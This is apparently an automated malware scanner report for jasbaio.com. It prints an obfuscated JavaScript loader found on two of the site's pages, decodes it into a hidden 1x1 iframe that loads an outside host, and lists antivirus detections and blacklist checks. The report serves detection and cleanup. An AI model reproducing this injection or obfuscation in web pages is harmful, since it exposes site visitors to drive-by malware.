New scan:

Malware Scanner report for jasbaio.com

Malicious/Suspicious/Total urls checked
2/0/4
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/2
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://jasbaio.com/
200 OK
Content-Length: 14189
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ClgwzwPlDp='';var nVJN='';var sTIG='';var eJC='';var sFM='';var sYV;var qOR='';var oJT=false;var bRDM=false;sYV='%f4%e6%fa%eb%ee%f0%f7%e7%c3%83%cf%9e%a6%8b%89%f2%a4%b8%bf%97%cc%ba%98%9d%b4%e8%b8%bd%8e%90%ee%a1%bc%aa%81%85%b2%a9%b7%a2%81%c5%a6%bb%a8%a4%ab%e4%b4%aa%cc%97%9b%f7%9e%e3%a8%e2%a6%ba%ad%c3%95%89%a6%ff%f7%f6%f8%ed%f9%ae%ed%d8%c1%ef%ea%af%a4%a9%fd%fc%fb%e6%d7%c1%b7%8d%84%e8%f8%fc%ff%d2%cd%a7%a7%b1%e9%e1%eb%fb%ea%e6%d9%d4%ea%d3%d4%b7%a6%af%e0%d7%c4%a4%f9%80%e2%e2%fb%ea%93%98%a4%e9%e5%f5%d7
... 4465 bytes are skipped ...
ar zMIQ='';kHZK^= dPQ('sAB');var tQNW="tQNW";var mRK=false;var xCW='';var oQZG='';var lXDH="lXDH";var sKU=false;aBXQ+=eMI(kHZK);var yVQ='';var qILG=false;var nPR="nPR";var lPYF=15403;}var bVO="bVO";var mGGV=false;var yCLV=43167;var gVD="gVD";var zAEP="";var hUEM='';var uVZ='';gHUS(aBXQ, 190);var oNNF="oNNF";var tBFQ="tBFQ";return aBXQ=new lDJ();var gAU="gAU";var dYVL=false;var lEO=false;var cLPG=false;};var vDM="vDM";var iCDD="";var dVZW=false;var aRY=false;dRDP(sYV);var uDI=20361;var pAV=false;

Decoded script:


document['w9896r8683i6734t6806e72693242'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://tapiroten.info/lin.cgi?jzo\'></iframe>');
document['w9896r8683i6734t6806e72693242'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://tapiroten.info/lin.cgi?jzo\'></iframe>');
/*** called setTimeout with document['w9896r8683i6734t6806e72693242'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://tapiroten.info/lin.cgi?jzo\'></iframe>');, 190 */
<iframe width=1 height=1 border=0 frameborder=0 src='http://tapiroten.info/lin.cgi?jzo'></iframe>

Antivirus reports:

AntiVir
HTML/Infected.WebPage.Gen2
TrendMicro-HouseCall
Possible_Hifrm-5
TrendMicro
Possible_Hifrm-5
AVG
HTML/Framer
Agnitum
JS.Obfuscated.Gen.1

http://jasbaio.com/index.html
200 OK
Content-Length: 14189
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

ClgwzwPlDp='';var nVJN='';var sTIG='';var eJC='';var sFM='';var sYV;var qOR='';var oJT=false;var bRDM=false;sYV='%f4%e6%fa%eb%ee%f0%f7%e7%c3%83%cf%9e%a6%8b%89%f2%a4%b8%bf%97%cc%ba%98%9d%b4%e8%b8%bd%8e%90%ee%a1%bc%aa%81%85%b2%a9%b7%a2%81%c5%a6%bb%a8%a4%ab%e4%b4%aa%cc%97%9b%f7%9e%e3%a8%e2%a6%ba%ad%c3%95%89%a6%ff%f7%f6%f8%ed%f9%ae%ed%d8%c1%ef%ea%af%a4%a9%fd%fc%fb%e6%d7%c1%b7%8d%84%e8%f8%fc%ff%d2%cd%a7%a7%b1%e9%e1%eb%fb%ea%e6%d9%d4%ea%d3%d4%b7%a6%af%e0%d7%c4%a4%f9%80%e2%e2%fb%ea%93%98%a4%e9%e5%f5%d7
... 4465 bytes are skipped ...
ar zMIQ='';kHZK^= dPQ('sAB');var tQNW="tQNW";var mRK=false;var xCW='';var oQZG='';var lXDH="lXDH";var sKU=false;aBXQ+=eMI(kHZK);var yVQ='';var qILG=false;var nPR="nPR";var lPYF=15403;}var bVO="bVO";var mGGV=false;var yCLV=43167;var gVD="gVD";var zAEP="";var hUEM='';var uVZ='';gHUS(aBXQ, 190);var oNNF="oNNF";var tBFQ="tBFQ";return aBXQ=new lDJ();var gAU="gAU";var dYVL=false;var lEO=false;var cLPG=false;};var vDM="vDM";var iCDD="";var dVZW=false;var aRY=false;dRDP(sYV);var uDI=20361;var pAV=false;

Decoded script:


document['w9896r8683i6734t6806e72693242'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://tapiroten.info/lin.cgi?jzo\'></iframe>');
document['w9896r8683i6734t6806e72693242'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://tapiroten.info/lin.cgi?jzo\'></iframe>');
/*** called setTimeout with document['w9896r8683i6734t6806e72693242'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://tapiroten.info/lin.cgi?jzo\'></iframe>');, 190 */
<iframe width=1 height=1 border=0 frameborder=0 src='http://tapiroten.info/lin.cgi?jzo'></iframe>

Antivirus reports:

AntiVir
HTML/Infected.WebPage.Gen2
TrendMicro-HouseCall
Possible_Hifrm-5
TrendMicro
Possible_Hifrm-5
AVG
HTML/Framer
Agnitum
JS.Obfuscated.Gen.1

http://jasbaio.com/test404page.js
404 Not Found
Content-Length: 767
Content-Type: text/html
clean
http://jasbaio.com//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js/
404 Not Found
Content-Length: 767
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: jasbaio.com

Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Mon, 31 Mar 2014 00:04:59 GMT
Accept-Ranges: bytes
Age: 0
ETag: "376d-4759c5ca6ad43"
Server: Apache/2
Content-Length: 14189
Content-Type: text/html
Expires: Mon, 31 Mar 2014 01:04:59 GMT
Last-Modified: Sat, 10 Oct 2009 22:38:56 GMT

...14189 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: jasbaio.com
Referer: http://www.google.com/search?q=jasbaio.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=jasbaio.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://jasbaio.com/

Result: jasbaio.com is not infected or malware details are not published yet.